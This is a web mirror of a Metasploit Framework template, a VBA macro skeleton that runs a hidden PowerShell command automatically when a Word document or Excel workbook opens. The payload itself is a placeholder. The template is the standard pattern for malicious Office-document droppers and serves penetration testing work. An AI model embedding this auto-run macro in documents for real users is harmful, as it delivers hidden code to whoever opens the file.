CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/data/templates/scripts/to_powershell.vba.template
Views: 11782
Sub %{sub_auto_open}()
  Dim %{var_powershell}
  %{var_powershell} = %{powershell}
  Call Shell(%{var_powershell}, vbHide)
End Sub
Sub AutoOpen()
  %{sub_auto_open}
End Sub
Sub Workbook_Open()
  %{sub_auto_open}
End Sub